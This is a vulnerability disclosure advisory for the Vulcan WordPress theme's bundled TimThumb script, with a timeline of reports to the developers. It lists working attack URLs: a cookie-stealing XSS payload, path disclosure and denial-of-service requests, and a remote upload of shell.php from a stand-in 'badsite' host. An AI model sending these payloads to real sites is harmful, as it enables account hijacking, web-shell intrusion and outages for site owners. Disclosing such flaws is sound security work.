------------------------- Affected products: ------------------------- Vulnerable are all versions of Vulcan theme for WordPress (in last versions there were fixed only vulnerabilities in TimThumb, but there are still FPD in other php-files). Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php). But AoF and DoS holes are fixed by disabling external hosts by default. If to change settings (to allow individual or all external hosts), which is allowed by software, then it's possible to conduct attacks on other sites. E.g. with using of DAVOSET. WAF bypass: At many sites unfixed version of TimThumb in theme is used, but they protect themselves using WAF (such as ModSecurity). Note, that WAF doesn't protect against FPD holes in this theme and TimThumb, and in some cases it doesn't protect against AoF and DoS. ---------- Details: ---------- XSS (WASC-08) (in old versions TimThumb): http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/vulcan/timthumb.php?src=1 http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31) (in old versions of TimThumb): http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php Full path disclosure (WASC-13): http://site/wp-content/themes/vulcan/ Besides index.php there are also potentially FPD in other php-files of this theme. ------------ Timeline: ------------ 2011.02.01 - informed developers from WooThemes about holes in their themes. 2011.02.04-12 - conversation about fixing holes in all their themes for WP. 2011.02.07 - announced at my site. 2011.02.08 - informed developer of TimThumb. 2011.02.13 - developer of TimThumb released version 1.25. 2011.02.13 - developers from WooThemes begun updating TimThumb in all their themes. 2011.04.13 - disclosed at my site about TimThumb and multiple themes. 2015.07.02 - disclosed at my site about Vulcan theme. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7850/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua |
(2)